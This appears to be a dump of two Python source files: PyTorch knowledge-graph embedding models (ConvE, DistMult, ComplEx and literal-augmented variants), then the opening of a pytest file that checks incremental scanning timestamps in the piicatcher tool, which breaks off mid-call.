e76c2ab06da8493e2b8bf1c91fdd1e227dd5d57e | 28,619 | py | Python | model.py | Otamio/kge-conve | eb2ed166cca57c8bc0d15649caddf4254c2edb9a | [
"Apache-2.0"
] | 34 | 2018-02-09T03:23:44.000Z | 2022-03-30T11:05:42.000Z | model.py | Otamio/kge-conve | eb2ed166cca57c8bc0d15649caddf4254c2edb9a | [
"Apache-2.0"
] | 8 | 2018-04-10T17:46:37.000Z | 2022-01-21T21:23:23.000Z | model.py | Otamio/kge-conve | eb2ed166cca57c8bc0d15649caddf4254c2edb9a | [
"Apache-2.0"
] | 13 | 2018-02-08T08:27:33.000Z | 2021-09-29T09:08:46.000Z | import torch
from torch.nn import functional as F, Parameter
from torch.autograd import Variable
from spodernet.utils.global_config import Config
from spodernet.utils.cuda_utils import CUDATimer
from torch.nn.init import xavier_normal_, xavier_uniform_
from spodernet.utils.cuda_utils import CUDATimer
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import torch.nn as nn
import pdb
from itertools import chain
timer = CUDATimer()
class Complex(torch.nn.Module):
def __init__(self, num_entities, num_relations):
super(Complex, self).__init__()
self.num_entities = num_entities
self.emb_e_real = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_e_img = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_rel_real = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.emb_rel_img = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e_real.weight.data)
xavier_normal_(self.emb_e_img.weight.data)
xavier_normal_(self.emb_rel_real.weight.data)
xavier_normal_(self.emb_rel_img.weight.data)
def forward(self, e1, rel):
e1_embedded_real = self.inp_drop(self.emb_e_real(e1)).view(Config.batch_size, -1)
rel_embedded_real = self.inp_drop(self.emb_rel_real(rel)).view(Config.batch_size, -1)
e1_embedded_img = self.inp_drop(self.emb_e_img(e1)).view(Config.batch_size, -1)
rel_embedded_img = self.inp_drop(self.emb_rel_img(rel)).view(Config.batch_size, -1)
e1_embedded_real = self.inp_drop(e1_embedded_real)
rel_embedded_real = self.inp_drop(rel_embedded_real)
e1_embedded_img = self.inp_drop(e1_embedded_img)
rel_embedded_img = self.inp_drop(rel_embedded_img)
# complex space bilinear product (equivalent to HolE)
realrealreal = torch.mm(e1_embedded_real*rel_embedded_real, self.emb_e_real.weight.transpose(1,0))
realimgimg = torch.mm(e1_embedded_real*rel_embedded_img, self.emb_e_img.weight.transpose(1,0))
imgrealimg = torch.mm(e1_embedded_img*rel_embedded_real, self.emb_e_img.weight.transpose(1,0))
imgimgreal = torch.mm(e1_embedded_img*rel_embedded_img, self.emb_e_real.weight.transpose(1,0))
pred = realrealreal + realimgimg + imgrealimg - imgimgreal
pred = F.sigmoid(pred)
return pred
class DistMult(torch.nn.Module):
def __init__(self, num_entities, num_relations):
super(DistMult, self).__init__()
self.emb_e = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_embedded= self.emb_e(e1)
rel_embedded= self.emb_rel(rel)
e1_embedded = e1_embedded.view(-1, Config.embedding_dim)
rel_embedded = rel_embedded.view(-1, Config.embedding_dim)
e1_embedded = self.inp_drop(e1_embedded)
rel_embedded = self.inp_drop(rel_embedded)
pred = torch.mm(e1_embedded*rel_embedded, self.emb_e.weight.transpose(1,0))
pred = F.sigmoid(pred)
return pred
class ConvE(torch.nn.Module):
def __init__(self, num_entities, num_relations):
super(ConvE, self).__init__()
self.emb_e = torch.nn.Embedding(num_entities, Config.embedding_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, Config.embedding_dim, padding_idx=0)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.hidden_drop = torch.nn.Dropout(Config.dropout)
self.feature_map_drop = torch.nn.Dropout2d(Config.feature_map_dropout)
self.loss = torch.nn.BCELoss()
self.conv1 = torch.nn.Conv2d(1, 32, (3, 3), 1, 0, bias=Config.use_bias)
self.bn0 = torch.nn.BatchNorm2d(1)
self.bn1 = torch.nn.BatchNorm2d(32)
self.bn2 = torch.nn.BatchNorm1d(Config.embedding_dim)
self.register_parameter('b', Parameter(torch.zeros(num_entities)))
self.fc = torch.nn.Linear(10368,Config.embedding_dim)
print(num_entities, num_relations)
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_embedded= self.emb_e(e1).view(Config.batch_size, 1, 10, 20)
rel_embedded = self.emb_rel(rel).view(Config.batch_size, 1, 10, 20)
stacked_inputs = torch.cat([e1_embedded, rel_embedded], 2)
stacked_inputs = self.bn0(stacked_inputs)
x= self.inp_drop(stacked_inputs)
x= self.conv1(x)
x= self.bn1(x)
x= F.relu(x)
x = self.feature_map_drop(x)
x = x.view(Config.batch_size, -1)
#print(x.size())
x = self.fc(x)
x = self.hidden_drop(x)
x = self.bn2(x)
x = F.relu(x)
x = torch.mm(x, self.emb_e.weight.transpose(1,0))
x += self.b.expand_as(x)
pred = F.sigmoid(x)
return pred
"""
Literal Models
--------------
"""
class DistMultLiteral(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(DistMultLiteral, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1)
rel_emb = self.emb_rel(rel)
e1_emb = e1_emb.view(-1, self.emb_dim)
rel_emb = rel_emb.view(-1, self.emb_dim)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(torch.cat([e1_emb, e1_num_lit], 1))
e2_multi_emb = self.emb_num_lit(torch.cat([self.emb_e.weight, self.numerical_literals], 1))
# End literals
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
pred = torch.mm(e1_emb*rel_emb, e2_multi_emb.t())
pred = F.sigmoid(pred)
return pred
class KBLN(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals, c, var):
super(KBLN, self).__init__()
self.num_entities = num_entities
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
# Fixed RBF parameters
print(c)
print(var)
self.c = Variable(torch.FloatTensor(c)).cuda()
self.var = Variable(torch.FloatTensor(var)).cuda()
# Weights for numerical, one every relation
self.nf_weights = nn.Embedding(num_relations, self.n_num_lit)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1).view(-1, self.emb_dim)
rel_emb = self.emb_rel(rel).view(-1, self.emb_dim)
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
score_l = torch.mm(e1_emb*rel_emb, self.emb_e.weight.t())
""" Begin numerical literals """
n_h = self.numerical_literals[e1.view(-1)] # (batch_size x n_lit)
n_t = self.numerical_literals # (num_ents x n_lit)
# Features (batch_size x num_ents x n_lit)
n = n_h.unsqueeze(1).repeat(1, self.num_entities, 1) - n_t
phi = self.rbf(n)
# Weights (batch_size, 1, n_lits)
w_nf = self.nf_weights(rel)
# (batch_size, num_ents)
score_n = torch.bmm(phi, w_nf.transpose(1, 2)).squeeze()
""" End numerical literals """
score = F.sigmoid(score_l + score_n)
return score
def rbf(self, n):
"""
Apply RBF kernel parameterized by (fixed) c and var, pointwise.
n: (batch_size, num_ents, n_lit)
"""
return torch.exp(-(n - self.c)**2 / self.var)
class MTKGNN_DistMult(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(MTKGNN_DistMult, self).__init__()
self.emb_dim = Config.embedding_dim
self.num_entities = num_entities
self.num_relations = num_relations
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_attr = torch.nn.Embedding(self.n_num_lit, self.emb_dim)
self.attr_net_left = torch.nn.Sequential(
torch.nn.Linear(2*self.emb_dim, 100),
torch.nn.Tanh(),
torch.nn.Linear(100, 1))
self.attr_net_right = torch.nn.Sequential(
torch.nn.Linear(2*self.emb_dim, 100),
torch.nn.Tanh(),
torch.nn.Linear(100, 1))
self.rel_params = chain(self.emb_e.parameters(), self.emb_rel.parameters())
self.attr_params = chain(self.emb_e.parameters(), self.emb_attr.parameters(),
self.attr_net_left.parameters(), self.attr_net_right.parameters())
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss_rel = torch.nn.BCELoss()
self.loss_attr = torch.nn.MSELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_embedded= self.emb_e(e1)
rel_embedded= self.emb_rel(rel)
e1_embedded = e1_embedded.view(-1, Config.embedding_dim)
rel_embedded = rel_embedded.view(-1, Config.embedding_dim)
e1_embedded = self.inp_drop(e1_embedded)
rel_embedded = self.inp_drop(rel_embedded)
pred = torch.mm(e1_embedded*rel_embedded, self.emb_e.weight.transpose(1,0))
pred = F.sigmoid(pred)
return pred
def forward_attr(self, e, mode='left'):
assert mode == 'left' or mode == 'right'
e_emb = self.emb_e(e.view(-1))
# Sample one numerical literal for each entity
e_attr = self.numerical_literals[e.view(-1)]
m = len(e_attr)
idxs = torch.randint(self.n_num_lit, size=(m,)).cuda()
attr_emb = self.emb_attr(idxs)
inputs = torch.cat([e_emb, attr_emb], dim=1)
pred = self.attr_net_left(inputs) if mode == 'left' else self.attr_net_right(inputs)
target = e_attr[range(m), idxs]
return pred, target
def forward_AST(self):
m = Config.batch_size
idxs_attr = torch.randint(self.n_num_lit, size=(m,)).cuda()
idxs_ent = torch.randint(self.num_entities, size=(m,)).cuda()
attr_emb = self.emb_attr(idxs_attr)
ent_emb = self.emb_e(idxs_ent)
inputs = torch.cat([ent_emb, attr_emb], dim=1)
pred_left = self.attr_net_left(inputs)
pred_right = self.attr_net_right(inputs)
target = self.numerical_literals[idxs_ent][range(m), idxs_attr]
return pred_left, pred_right, target
class ComplexLiteral(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ComplexLiteral, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e_real = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_e_img = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel_real = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
self.emb_rel_img = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit_real = torch.nn.Sequential(
torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim),
torch.nn.Tanh()
)
self.emb_num_lit_img = torch.nn.Sequential(
torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim),
torch.nn.Tanh()
)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e_real.weight.data)
xavier_normal_(self.emb_e_img.weight.data)
xavier_normal_(self.emb_rel_real.weight.data)
xavier_normal_(self.emb_rel_img.weight.data)
def forward(self, e1, rel):
e1_emb_real = self.emb_e_real(e1).view(Config.batch_size, -1)
rel_emb_real = self.emb_rel_real(rel).view(Config.batch_size, -1)
e1_emb_img = self.emb_e_img(e1).view(Config.batch_size, -1)
rel_emb_img = self.emb_rel_img(rel).view(Config.batch_size, -1)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb_real = self.emb_num_lit_real(torch.cat([e1_emb_real, e1_num_lit], 1))
e1_emb_img = self.emb_num_lit_img(torch.cat([e1_emb_img, e1_num_lit], 1))
e2_multi_emb_real = self.emb_num_lit_real(torch.cat([self.emb_e_real.weight, self.numerical_literals], 1))
e2_multi_emb_img = self.emb_num_lit_img(torch.cat([self.emb_e_img.weight, self.numerical_literals], 1))
# End literals
e1_emb_real = self.inp_drop(e1_emb_real)
rel_emb_real = self.inp_drop(rel_emb_real)
e1_emb_img = self.inp_drop(e1_emb_img)
rel_emb_img = self.inp_drop(rel_emb_img)
realrealreal = torch.mm(e1_emb_real*rel_emb_real, e2_multi_emb_real.t())
realimgimg = torch.mm(e1_emb_real*rel_emb_img, e2_multi_emb_img.t())
imgrealimg = torch.mm(e1_emb_img*rel_emb_real, e2_multi_emb_img.t())
imgimgreal = torch.mm(e1_emb_img*rel_emb_img, e2_multi_emb_real.t())
pred = realrealreal + realimgimg + imgrealimg - imgimgreal
pred = F.sigmoid(pred)
return pred
class ConvELiteral(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ConvELiteral, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = torch.nn.Sequential(
torch.nn.Linear(self.emb_dim+self.n_num_lit, self.emb_dim),
torch.nn.Tanh()
)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.hidden_drop = torch.nn.Dropout(Config.dropout)
self.feature_map_drop = torch.nn.Dropout2d(Config.feature_map_dropout)
self.loss = torch.nn.BCELoss()
self.conv1 = torch.nn.Conv2d(1, 32, (3, 3), 1, 0, bias=Config.use_bias)
self.bn0 = torch.nn.BatchNorm2d(1)
self.bn1 = torch.nn.BatchNorm2d(32)
self.bn2 = torch.nn.BatchNorm1d(self.emb_dim)
self.register_parameter('b', Parameter(torch.zeros(num_entities)))
self.fc = torch.nn.Linear(10368, self.emb_dim)
print(num_entities, num_relations)
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1).view(Config.batch_size, -1)
rel_emb = self.emb_rel(rel)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(torch.cat([e1_emb, e1_num_lit], 1))
e2_multi_emb = self.emb_num_lit(torch.cat([self.emb_e.weight, self.numerical_literals], 1))
# End literals
e1_emb = e1_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
rel_emb = rel_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
stacked_inputs = torch.cat([e1_emb, rel_emb], 2)
stacked_inputs = self.bn0(stacked_inputs)
x = self.inp_drop(stacked_inputs)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.feature_map_drop(x)
x = x.view(Config.batch_size, -1)
# print(x.size())
x = self.fc(x)
x = self.hidden_drop(x)
x = self.bn2(x)
x = F.relu(x)
x = torch.mm(x, e2_multi_emb.t())
x += self.b.expand_as(x)
pred = F.sigmoid(x)
return pred
class Gate(nn.Module):
def __init__(self,
input_size,
output_size,
# gate_activation=nn.functional.softmax):
gate_activation=nn.functional.sigmoid):
super(Gate, self).__init__()
self.output_size = output_size
self.gate_activation = gate_activation
self.g = nn.Linear(input_size, output_size)
self.g1 = nn.Linear(output_size, output_size, bias=False)
self.g2 = nn.Linear(input_size-output_size, output_size, bias=False)
self.gate_bias = nn.Parameter(torch.zeros(output_size))
def forward(self, x_ent, x_lit):
x = torch.cat([x_ent, x_lit], 1)
g_embedded = F.tanh(self.g(x))
gate = self.gate_activation(self.g1(x_ent) + self.g2(x_lit) + self.gate_bias)
output = (1-gate) * x_ent + gate * g_embedded
return output
class DistMultLiteral_gate(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(DistMultLiteral_gate, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1)
rel_emb = self.emb_rel(rel)
e1_emb = e1_emb.view(-1, self.emb_dim)
rel_emb = rel_emb.view(-1, self.emb_dim)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(e1_emb, e1_num_lit)
e2_multi_emb = self.emb_num_lit(self.emb_e.weight, self.numerical_literals)
# End literals
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
pred = torch.mm(e1_emb*rel_emb, e2_multi_emb.t())
pred = F.sigmoid(pred)
return pred
class ComplexLiteral_gate(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ComplexLiteral_gate, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e_real = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_e_img = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel_real = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
self.emb_rel_img = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit_real = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
self.emb_num_lit_img = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e_real.weight.data)
xavier_normal_(self.emb_e_img.weight.data)
xavier_normal_(self.emb_rel_real.weight.data)
xavier_normal_(self.emb_rel_img.weight.data)
def forward(self, e1, rel):
e1_emb_real = self.emb_e_real(e1).view(Config.batch_size, -1)
rel_emb_real = self.emb_rel_real(rel).view(Config.batch_size, -1)
e1_emb_img = self.emb_e_img(e1).view(Config.batch_size, -1)
rel_emb_img = self.emb_rel_img(rel).view(Config.batch_size, -1)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb_real = self.emb_num_lit_real(e1_emb_real, e1_num_lit)
e1_emb_img = self.emb_num_lit_img(e1_emb_img, e1_num_lit)
e2_multi_emb_real = self.emb_num_lit_real(self.emb_e_real.weight, self.numerical_literals)
e2_multi_emb_img = self.emb_num_lit_img(self.emb_e_img.weight, self.numerical_literals)
# End literals
e1_emb_real = self.inp_drop(e1_emb_real)
rel_emb_real = self.inp_drop(rel_emb_real)
e1_emb_img = self.inp_drop(e1_emb_img)
rel_emb_img = self.inp_drop(rel_emb_img)
realrealreal = torch.mm(e1_emb_real*rel_emb_real, e2_multi_emb_real.t())
realimgimg = torch.mm(e1_emb_real*rel_emb_img, e2_multi_emb_img.t())
imgrealimg = torch.mm(e1_emb_img*rel_emb_real, e2_multi_emb_img.t())
imgimgreal = torch.mm(e1_emb_img*rel_emb_img, e2_multi_emb_real.t())
pred = realrealreal + realimgimg + imgrealimg - imgimgreal
pred = F.sigmoid(pred)
return pred
class ConvELiteral_gate(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals):
super(ConvELiteral_gate, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
self.emb_num_lit = Gate(self.emb_dim+self.n_num_lit, self.emb_dim)
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.hidden_drop = torch.nn.Dropout(Config.dropout)
self.feature_map_drop = torch.nn.Dropout2d(Config.feature_map_dropout)
self.loss = torch.nn.BCELoss()
self.conv1 = torch.nn.Conv2d(1, 32, (3, 3), 1, 0, bias=Config.use_bias)
self.bn0 = torch.nn.BatchNorm2d(1)
self.bn1 = torch.nn.BatchNorm2d(32)
self.bn2 = torch.nn.BatchNorm1d(self.emb_dim)
self.register_parameter('b', Parameter(torch.zeros(num_entities)))
self.fc = torch.nn.Linear(10368, self.emb_dim)
print(num_entities, num_relations)
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1).view(Config.batch_size, -1)
rel_emb = self.emb_rel(rel)
# Begin literals
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_emb = self.emb_num_lit(e1_emb, e1_num_lit)
e2_multi_emb = self.emb_num_lit(self.emb_e.weight, self.numerical_literals)
# End literals
e1_emb = e1_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
rel_emb = rel_emb.view(Config.batch_size, 1, 10, self.emb_dim//10)
stacked_inputs = torch.cat([e1_emb, rel_emb], 2)
stacked_inputs = self.bn0(stacked_inputs)
x = self.inp_drop(stacked_inputs)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.feature_map_drop(x)
x = x.view(Config.batch_size, -1)
# print(x.size())
x = self.fc(x)
x = self.hidden_drop(x)
x = self.bn2(x)
x = F.relu(x)
x = torch.mm(x, e2_multi_emb.t())
x += self.b.expand_as(x)
pred = F.sigmoid(x)
return pred
"""
TEXT LITERALS
-----------------------------------
"""
class GateMulti(nn.Module):
def __init__(self, emb_size, num_lit_size, txt_lit_size, gate_activation=nn.functional.sigmoid):
super(GateMulti, self).__init__()
self.emb_size = emb_size
self.num_lit_size = num_lit_size
self.txt_lit_size = txt_lit_size
self.gate_activation = gate_activation
self.g = nn.Linear(emb_size+num_lit_size+txt_lit_size, emb_size)
self.gate_ent = nn.Linear(emb_size, emb_size, bias=False)
self.gate_num_lit = nn.Linear(num_lit_size, emb_size, bias=False)
self.gate_txt_lit = nn.Linear(txt_lit_size, emb_size, bias=False)
self.gate_bias = nn.Parameter(torch.zeros(emb_size))
def forward(self, x_ent, x_lit_num, x_lit_txt):
x = torch.cat([x_ent, x_lit_num, x_lit_txt], 1)
g_embedded = F.tanh(self.g(x))
gate = self.gate_activation(self.gate_ent(x_ent) + self.gate_num_lit(x_lit_num) + self.gate_txt_lit(x_lit_txt) + self.gate_bias)
output = (1-gate) * x_ent + gate * g_embedded
return output
class DistMultLiteral_gate_text(torch.nn.Module):
def __init__(self, num_entities, num_relations, numerical_literals, text_literals):
super(DistMultLiteral_gate_text, self).__init__()
self.emb_dim = Config.embedding_dim
self.emb_e = torch.nn.Embedding(num_entities, self.emb_dim, padding_idx=0)
self.emb_rel = torch.nn.Embedding(num_relations, self.emb_dim, padding_idx=0)
# Num. Literal
# num_ent x n_num_lit
self.numerical_literals = Variable(torch.from_numpy(numerical_literals)).cuda()
self.n_num_lit = self.numerical_literals.size(1)
# Txt. Literal
# num_ent x n_txt_lit
self.text_literals = Variable(torch.from_numpy(text_literals)).cuda()
self.n_txt_lit = self.text_literals.size(1)
# LiteralE's g
self.emb_lit = GateMulti(self.emb_dim, self.n_num_lit, self.n_txt_lit)
# Dropout + loss
self.inp_drop = torch.nn.Dropout(Config.input_dropout)
self.loss = torch.nn.BCELoss()
def init(self):
xavier_normal_(self.emb_e.weight.data)
xavier_normal_(self.emb_rel.weight.data)
def forward(self, e1, rel):
e1_emb = self.emb_e(e1)
rel_emb = self.emb_rel(rel)
e1_emb = e1_emb.view(-1, self.emb_dim)
rel_emb = rel_emb.view(-1, self.emb_dim)
# Begin literals
# --------------
e1_num_lit = self.numerical_literals[e1.view(-1)]
e1_txt_lit = self.text_literals[e1.view(-1)]
e1_emb = self.emb_lit(e1_emb, e1_num_lit, e1_txt_lit)
e2_multi_emb = self.emb_lit(self.emb_e.weight, self.numerical_literals, self.text_literals)
# --------------
# End literals
e1_emb = self.inp_drop(e1_emb)
rel_emb = self.inp_drop(rel_emb)
pred = torch.mm(e1_emb*rel_emb, e2_multi_emb.t())
pred = F.sigmoid(pred)
return pred
| 36.457325 | 136 | 0.662672 | 4,302 | 28,619 | 4.089261 | 0.046025 | 0.084357 | 0.038085 | 0.032401 | 0.878411 | 0.859823 | 0.829923 | 0.804798 | 0.76711 | 0.740564 | 0 | 0.018824 | 0.220378 | 28,619 | 784 | 137 | 36.503827 | 0.769631 | 0.038925 | 0 | 0.683367 | 0 | 0 | 0.000734 | 0 | 0 | 0 | 0 | 0 | 0.002004 | 1 | 0.086172 | false | 0 | 0.022044 | 0 | 0.170341 | 0.01002 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e7b1681e8b4bed4d11e728a31b284abf4edeb649 | 20,288 | py | Python | tests/test_incremental.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 4 | 2019-07-10T08:52:56.000Z | 2019-10-23T13:58:18.000Z | tests/test_incremental.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 11 | 2019-03-21T11:28:07.000Z | 2019-08-30T12:13:28.000Z | tests/test_incremental.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 2 | 2019-03-21T11:06:49.000Z | 2019-03-27T06:05:52.000Z | import datetime
import time
from typing import Generator, Tuple
import pytest
from dbcat.api import scan_sources
from dbcat.catalog import Catalog
from pytest_cases import fixture
from piicatcher.api import scan_database
from piicatcher.generators import column_generator, data_generator
from piicatcher.output import output_dict, output_tabular
@fixture(scope="module")
def setup_incremental(
load_sample_data, load_data
) -> Generator[Tuple[Catalog, int], None, None]:
catalog, source_id, name = load_sample_data
with catalog.managed_session:
scan_sources(catalog, [name], include_table_regex=["sample"])
time.sleep(1)
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
scan_database(catalog=catalog, source=source, include_table_regex=["sample"])
time.sleep(1)
with catalog.managed_session:
scan_sources(catalog, [name])
time.sleep(1)
with catalog.managed_session:
scan_database(catalog=catalog, source=source, include_table_regex=["partial.*"])
yield catalog, source_id
def test_incremental_scan(setup_incremental):
catalog, source_id = setup_incremental
with catalog.managed_session:
source = catalog.get_source_by_id(source_id)
# there should be 2 tasks
tasks = catalog.get_tasks_by_app_name("piicatcher.{}".format(source.name))
assert len(tasks) == 2
first_task = tasks[0]
second_task = tasks[1]
schemata = catalog.search_schema(source_like=source.name, schema_like="%")
# sample table should have earlier timestamp
sample_table = catalog.get_table(
source_name=source.name, schema_name=schemata[0].name, table_name="sample"
)
assert sample_table.updated_at < first_task.updated_at
assert sample_table.updated_at < second_task.updated_at
# full_pii and no_pii should have timestamp between tasks as they are not scanned because of include_table_regex
for table_name in ["no_pii", "full_pii", "partial_pii"]:
table = catalog.get_table(
source_name=source.name,
schema_name=schemata[0].name,
table_name=table_name,
)
assert table.updated_at > first_task.updated_at
assert table.updated_at < second_task.updated_at
for column in catalog.get_columns_for_table(table):
assert column.updated_at > first_task.updated_at
assert column.updated_at < second_task.updated_at
# partial_data_type.ssn should have the latest timestamps
partial_data_type = catalog.get_table(
source_name=source.name,
schema_name=schemata[0].name,
table_name="partial_data_type",
)
assert partial_data_type.updated_at > first_task.updated_at
assert partial_data_type.updated_at < second_task.updated_at
partial_data_type_id = catalog.get_column(
source_name=source.name,
schema_name=schemata[0].name,
table_name="partial_data_type",
column_name="id",
)
assert partial_data_type_id.updated_at > first_task.updated_at
assert partial_data_type_id.updated_at < second_task.updated_at
partial_data_type_ssn = catalog.get_column(
source_name=source.name,
